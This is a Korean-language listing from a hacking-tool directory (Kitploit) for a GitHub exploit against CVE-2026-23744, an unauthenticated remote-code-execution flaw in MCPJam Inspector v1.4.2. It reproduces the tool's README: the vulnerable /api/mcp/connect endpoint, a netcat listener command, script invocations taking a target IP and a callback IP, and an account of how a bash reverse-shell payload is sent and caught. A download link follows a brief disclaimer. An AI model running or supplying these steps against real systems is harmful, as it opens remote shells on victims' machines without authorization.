Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/alisster00/cve-2026-23744-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRemote Access Tool
GitHubalisster00/cve-2026-23744-rce

CVE-2026-23744-RCE

이 유틸리티는 MCPJam v1.4.2를 포함한 연구 중에 만들어졌습니다. 이 애플리케이션은 서버 구성 객체를 수락하는 API 엔드포인트를 노출합니다. 특정 조건에서 불충분한 검증으로 인해 의도하지 않은 명령 실행이 허용될 수 있습니다.

저장소 보기
113개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

MCPJam Inspector v1.4.2 - RCE 익스플로잇

취약점 설명

MCPJam Inspector는 /api/mcp/connect 엔드포인트에 인증되지 않은 원격 코드 실행(RCE) 취약점을 포함하고 있습니다. 이 취약점을 통해 공격자는 악의적인 MCP 서버 구성 페이로드를 전송하여 임의의 명령을 실행할 수 있습니다.

해당 엔드포인트는 command와 args 배열을 포함하는 serverConfig 객체가 포함된 JSON 페이로드를 수락하며, 이는 적절한 검증 또는 정화 없이 시스템에서 직접 실행됩니다.

영향을 받는 버전

  • MCPJam Inspector v1.4.2 및 그 이전 버전

사용법

사전 요구사항

  • Python 3.6+
  • requests 라이브러리: pip install requests
  • 리스너용 netcat 또는 socat
  • 빠른 시작

    터미널 1 - 리스너 시작:

    root@kitploit:~
    nc -lvnp 4444
    

    터미널 2 - 익스플로잇 실행:

    root@kitploit:~
    python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 4444
    

    예제

    root@kitploit:~
    # 기본 (포트 6274, 콜백 포트 4444)
    python3 script.py <TARGET_IP> -l <YOUR_IP>
    
    # 사용자 지정 MCPJam 포트
    python3 script.py <TARGET_IP> -p 6274 -l <YOUR_IP>
    
    # 사용자 지정 리스너 포트
    python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 5555
    

    작동 방식

    1. 스크립트가 대상에서 MCPJam에 접근 가능한지 확인합니다.
    2. bash 리버스 셸을 포함한 악의적인 MCP 서버 페이로드를 구성합니다.
    3. 페이로드를 /api/mcp/connect 엔드포인트로 전송합니다.
    4. MCPJam이 명령을 처리하고 리버스 셸 콜백을 시작합니다.
    5. 사용자가 리스너에서 대화형 셸을 수신합니다.

    면책 조항

    ⚠️ 면책 조항:

    이 익스플로잇은 교육 및 승인된 보안 테스트 목적으로만 제공됩니다. 컴퓨터 시스템에 대한 무단 액세스는 불법입니다. 사용자는 다음에 대해 전적으로 책임을 집니다:

    • 시스템 테스트 전에 적절한 승인을 받는 것
    • 모든 관련 법률 및 규정 준수
    • 오용으로 인한 모든 손해 또는 법적 결과

    저자는 이 도구의 오용이나 손해에 대한 어떠한 책임도 지지 않습니다. 사용에 따른 위험은 본인이 부담합니다.

    기술적 세부 사항

    • 취약한 엔드포인트: /api/mcp/connect
    • 메서드: POST
    • 인증: 필요 없음
    • 영향: 인증되지 않은 원격 코드 실행
    도구 다운로드